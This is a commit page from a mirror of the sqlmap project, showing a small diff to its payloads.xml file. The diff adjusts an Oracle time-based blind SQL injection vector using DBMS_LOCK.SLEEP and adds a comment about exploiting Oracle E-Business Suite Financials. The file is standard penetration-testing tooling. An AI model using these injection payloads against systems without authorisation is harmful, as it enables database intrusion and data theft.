sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-04-26 03:43:46 +03:00
Code Issues Packages Projects Releases Wiki Activity

minor fix

Browse Source
This commit is contained in:
Bernardo Damele 2014-04-09 12:29:52 +00:00
parent a5aa1c2f94
commit 42bde5328d
1 changed files with 3 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
xml/payloads.xml
View File

@ -3324,6 +3324,7 @@ Formats:
</details> </details>
</test> </test>
<!-- Without parentesis because it never works with them, useful to exploit SQL injection in Oracle E-Business Suite Financials -->
<test> <test>
<title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title> <title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
<stype>5</stype> <stype>5</stype>
@ -3331,9 +3332,9 @@ Formats:
<risk>0</risk> <risk>0</risk>
<clause>1,3</clause> <clause>1,3</clause>
<where>3</where> <where>3</where>
<vector>(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE [RANDNUM]; END IF; END)</vector> <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
<request> <request>
<payload>(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE [RANDNUM]; END IF; END)</payload> <payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</payload>
</request> </request>
<response> <response>
<time>[SLEEPTIME]</time> <time>[SLEEPTIME]</time>